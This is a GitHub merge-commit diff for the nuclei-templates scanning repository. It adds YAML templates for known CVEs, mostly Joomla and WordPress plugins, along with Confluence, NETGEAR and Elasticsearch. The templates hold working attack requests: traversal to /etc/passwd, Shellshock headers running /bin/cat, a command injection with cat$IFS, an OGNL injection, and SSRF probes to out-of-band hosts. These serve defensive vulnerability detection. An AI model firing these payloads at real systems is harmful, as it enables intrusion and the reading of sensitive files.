Merge pull request #88 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-09-04 16:44:54 +05:30 committed by GitHub
commit d01835f36f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
109 changed files with 2223 additions and 891 deletions

View File

@ -32,4 +32,5 @@ jobs:
- name: Template Validation
run: |
nuclei -validate -t . -exclude .pre-commit-config.yaml
nuclei -validate -w ./workflows -exclude .pre-commit-config.yaml
shell: bash

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
**146 directories, 1962 files**.
**147 directories, 1989 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |

View File

@ -0,0 +1,26 @@
id: CVE-2010-1219
info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1304
info:
name: Joomla! Component User Status - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1305
info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1307
info:
name: Joomla! Component Magic Updater - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12070
- https://www.cvedetails.com/cve/CVE-2010-1307
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1313
info:
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12082
- https://www.cvedetails.com/cve/CVE-2010-1313
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1354
info:
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12102
- https://www.cvedetails.com/cve/CVE-2010-1354
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1470
info:
name: Joomla! Component Web TV 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12166
- https://www.cvedetails.com/cve/CVE-2010-1470
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1476
info:
name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12150
- https://www.cvedetails.com/cve/CVE-2010-1476
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1494
info:
name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12113
- https://www.cvedetails.com/cve/CVE-2010-1494
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1717
info:
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12291
- https://www.cvedetails.com/cve/CVE-2010-1717
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1980
info:
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12085
- https://www.cvedetails.com/cve/CVE-2010-1980
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1981
info:
name: Joomla! Component Fabrik 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12087
- https://www.cvedetails.com/cve/CVE-2010-1981
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-2122
info:
name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12623
- https://www.cvedetails.com/cve/CVE-2010-2122
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -24,6 +24,7 @@ requests:
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -25,11 +25,14 @@ requests:
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"

View File

@ -0,0 +1,27 @@
id: CVE-2015-4050
info:
name: ESI unauthorized access
author: ELSFA7110,meme-lord
severity: high
description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment.
tags: cve,cve2015,symfony,rce
reference:
- https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
- https://nvd.nist.gov/vuln/detail/CVE-2015-4050
requests:
- method: GET
path:
- "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Credits"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,22 @@
id: CVE-2015-5461
info:
name: StageShow <= 5.0.8 - Open Redirect
author: 0x_Akoko
severity: medium
description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
reference:
- https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16
- https://nvd.nist.gov/vuln/detail/CVE-2015-5461
tags: redirect,cve,cve2015,wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

View File

@ -0,0 +1,27 @@
id: CVE-2016-6277
info:
name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
author: pikpikcu
severity: critical
description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
tags: cve,cves2016,netgear,rce,iot
reference:
- https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
- https://nvd.nist.gov/vuln/detail/CVE-2016-6277
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -89,7 +89,7 @@ requests:
- welcome
attack: sniper
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -0,0 +1,24 @@
id: CVE-2017-18638
info:
name: Graphite 'graphite.composer.views.send_email' SSRF
author: huowuzhao
severity: high
description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
reference:
- http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
- https://github.com/graphite-project/graphite-web/issues/2008
- https://github.com/advisories/GHSA-vfj6-275q-4pvm
- https://nvd.nist.gov/vuln/detail/CVE-2017-18638
tags: cve,cve2017,graphite,ssrf,oob
requests:
- method: GET
path:
- '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

View File

@ -16,6 +16,7 @@ requests:
- "{{BaseURL}}/wp-json/wp/v2/users/"
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
@ -33,8 +34,9 @@ requests:
- '"name":'
- '"avatar_urls":'
condition: and
extractors:
- type: regex
part: body
regex:
- '"name":"[^"]*"'
- '"name":"[^"]*"'

View File

@ -4,6 +4,7 @@ info:
name: WordPress Plugin Localize My Post 1.0 - LFI
author: 0x_Akoko,0x240x23elu
severity: high
description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
reference: https://www.exploit-db.com/exploits/45439
tags: wordpress,cve2018,cve,lfi

View File

@ -0,0 +1,30 @@
id: CVE-2018-8719
info:
name: WordPress Plugin WP Security Audit Log 3.1.1 - Information Disclosure
author: LogicalHunter
severity: medium
description: Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find sensitive information
reference:
- https://www.exploit-db.com/exploits/44371
- https://vuldb.com/?id.115817
- https://www.cvedetails.com/cve/CVE-2018-8719/
tags: wordpress,wp-plugin,cve,cve2018,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[TXT]"
- ".log"
- "Index of"
condition: and

View File

@ -18,7 +18,6 @@ requests:
matchers-condition: and
matchers:
- type: word
words:
- "phpmyadmin.net"

View File

@ -12,6 +12,8 @@ requests:
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
- "{{BaseURL}}/web/static/c:/windows/win.ini"
- "{{BaseURL}}/base/static/c:/windows/win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -4,7 +4,10 @@ info:
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
- https://www.cybersecurity-help.cz/vdb/SB2019041819
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:

View File

@ -20,7 +20,7 @@ requests:
ids: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -0,0 +1,30 @@
id: CVE-2019-17503
info:
name: Kirona Dynamic Resource Scheduling - information disclosure
author: LogicalHunter
severity: medium
description: An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly _ it contains sensitive information about the database through the SQL queries within this batch file
reference:
- https://www.exploit-db.com/exploits/47498
- https://nvd.nist.gov/vuln/detail/CVE-2019-17503
tags: cve,cve2019,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/osm/REGISTER.cmd"
- "{{BaseURL}}/osm_tiles/REGISTER.cmd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "DEBUGMAPSCRIPT=TRUE"
- "@echo off"
condition: and

View File

@ -8,6 +8,8 @@ info:
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
@ -17,7 +19,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"

View File

@ -1,26 +0,0 @@
id: CVE-2019-9618
info:
name: GraceMedia Media Player 1.0 - Local File Inclusion
author: 0x_Akoko
severity: critical
reference:
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,34 @@
id: CVE-2020-11547
info:
name: PRTG Network Monitor < 20.1.57.1745 - Information Disclosure
author: x6263
severity: medium
description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request.
reference:
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547
tags: cve,cve2020,prtg,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/public/login.htm?type=probes"
- "{{BaseURL}}/public/login.htm?type=requests"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains((body_1), 'Probe #1') && contains((body_2), '<span>Configuration Requests Sent</span>')"
part: body
- type: word
words:
- "prtg_network_monitor"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: CVE-2020-28976
info:
name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
author: LogicalHunter
severity: high
description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
reference:
- https://www.exploit-db.com/exploits/49189
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
stop-at-first-match: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

View File

@ -4,6 +4,7 @@ info:
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
reference:
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395

View File

@ -13,9 +13,6 @@ info:
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
- https://www.hpe.com/us/en/home.html # vendor homepage
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
requests:
- method: GET
path:

View File

@ -0,0 +1,36 @@
id: CVE-2021-22145
info:
name: ElasticSearch 7.13.3 - Memory disclosure
author: dhiyaneshDk
severity: medium
description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
reference:
- https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
- https://nvd.nist.gov/vuln/detail/CVE-2021-22145
- https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
tags: cve,cve2021,elascticsearch
requests:
- method: POST
path:
- '{{BaseURL}}/_bulk'
headers:
Content-Type: application/json
body: |
@
matchers-condition: and
matchers:
- type: word
words:
- 'root_cause'
- 'truncated'
- 'reason'
part: body
condition: and
- type: status
status:
- 400

View File

@ -18,7 +18,9 @@ requests:
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status

View File

@ -0,0 +1,20 @@
id: CVE-2021-24288
info:
name: AcyMailing < 7.5.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription.
reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
tags: wordpress,cve,cve2021,redirect,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

View File

@ -5,6 +5,7 @@ info:
author: johnjhacking
severity: medium
tags: cve,cve2021,wp-plugin,wordpress,xss
description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue.
reference:
- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
- https://wordpress.org/plugins/marmoset-viewer/#developers

View File

@ -0,0 +1,47 @@
id: CVE-2021-26084
info:
author: dhiyaneshDk,philippedelteil
severity: critical
name: Confluence Server OGNL injection - RCE
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if Allow people to sign up to create their account is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
tags: cve,cve2021,rce,confluence
reference:
- https://jira.atlassian.com/browse/CONFSERVER-67940
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084
- https://nvd.nist.gov/vuln/detail/CVE-2021-26084
- https://github.com/Udyz/CVE-2021-26084
requests:
- raw:
- |
POST /{{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
payloads:
path:
- pages/createpage-entervariables.action?SpaceKey=x
- confluence/pages/createpage-entervariables.action?SpaceKey=x
- wiki/pages/createpage-entervariables.action?SpaceKey=x
- pages/doenterpagevariables.action
- pages/createpage.action?spaceKey=myproj
- pages/templates2/viewpagetemplate.action
- pages/createpage-entervariables.action
- template/custom/content-editor
- templates/editor-preload-container
- users/user-dark-features
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'value="aaaa{140592=null}'

View File

@ -0,0 +1,33 @@
id: CVE-2021-28918
info:
name: Netmask NPM Package SSRF
author: johnjhacking
severity: critical
description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
tags: cve,cve2021,npm,netmask,ssrf,lfi
reference:
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
requests:
- method: GET
path:
- "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
- "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
- "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- "Apache Server Status"
- "Server Version"
condition: and
- type: regex
regex:
- "root:.*:0:0:"

View File

@ -0,0 +1,28 @@
id: CVE-2021-31856
info:
name: Layer5 Meshery 0.5.2 SQLi
author: princechaddha
severity: critical
